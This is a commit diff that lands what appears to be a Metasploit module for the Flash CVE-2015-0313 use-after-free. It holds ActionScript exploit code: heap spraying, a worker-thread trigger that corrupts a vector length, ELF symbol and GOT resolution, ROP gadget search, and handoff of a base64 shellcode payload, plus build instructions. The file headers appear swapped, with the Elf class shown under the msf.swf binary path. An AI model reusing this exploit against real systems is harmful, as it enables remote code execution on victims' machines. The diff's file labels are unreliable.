Land rapid7#5522, adobe_flash_worker_byte_array_uaf in the flash renderer

Author: wchen-r7

data/exploits/CVE-2015-0313/msf.swf

@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}

external/source/exploits/CVE-2015-0313/Elf.as

@@ -0,0 +1,113 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Be support to support 16.0 as target-player (flex-config.xml).
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 5. Build with: mxmlc -o msf.swf Main.as
+
+// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
+// Modified to be used from msf
+package
+{
+import flash.display.Sprite
+import flash.display.LoaderInfo
+import flash.events.Event
+import flash.utils.ByteArray
+import flash.system.Worker
+import flash.system.WorkerDomain
+import flash.system.MessageChannel
+import flash.system.ApplicationDomain
+import avm2.intrinsics.memory.casi32
+import mx.utils.Base64Decoder
+
+public class Exploit extends Sprite
+{
+    private var ov:Vector.<Object> = new Vector.<Object>(80000)
+    private var uv:Vector.<uint>
+    private var ba:ByteArray = new ByteArray()
+    private var worker:Worker
+    private var mc:MessageChannel
+    private var b64:Base64Decoder = new Base64Decoder()
+    private var payload:ByteArray
+    private var platform:String
+    private var os:String
+	private var exploiter:Exploiter
+
+    public function Exploit()
+    {
+        if (Worker.current.isPrimordial) mainThread()
+        else workerThread()
+    }
+
+    private function mainThread():void
+    {
+        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+        os = LoaderInfo(this.root.loaderInfo).parameters.os
+        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+        var pattern:RegExp = / /g;
+        b64_payload = b64_payload.replace(pattern, "+")
+        b64.decode(b64_payload)
+        payload = b64.toByteArray()
+
+        ba.length = 0x1000
+        ba.shareable = true
+        for (var i:uint = 0; i < ov.length; i++) {
+            ov[i] = new Vector.<uint>(1014)
+            ov[i][0] = 0xdeedbeef
+        }
+        for (i = 0; i < 70000; i += 2) {
+			delete(ov[i])
+		}
+        worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
+        mc = worker.createMessageChannel(Worker.current)
+        mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
+        worker.setSharedProperty("mc", mc)
+        worker.setSharedProperty("ba", ba)
+        ApplicationDomain.currentDomain.domainMemory = ba
+        worker.start()
+    }
+
+    private function workerThread():void
+    {
+        var ba:ByteArray = Worker.current.getSharedProperty("ba")
+        var mc:MessageChannel = Worker.current.getSharedProperty("mc")
+        ba.clear()
+        ov[0] = new Vector.<uint>(1022)
+        mc.send("")
+        while (mc.messageAvailable);
+        for (var i:uint = 0;; i++) {
+        	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
+				ov[0][i] = 0xffffffff
+				break
+        	}
+        }
+		ov[0][0xfffffffe] = 1014
+        mc.send("")
+    }
+
+    private function onMessage(e:Event):void
+    {
+        var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
+		Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
+        if (mod == 1022) mc.receive()
+        else {			
+	        for (var i:uint = 0; i < ov.length; i++) {
+	            if (ov[i].length == 0xffffffff) {
+					uv = ov[i]
+				} else {
+					if (ov[i] != null) {
+						delete(ov[i])
+						ov[i] = null
+					}
+				}
+	        }
+			if (uv == null) {
+				Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
+				return
+			}
+			exploiter = new Exploiter(this, platform, os, payload, uv)
+        }
+    }
+}
+}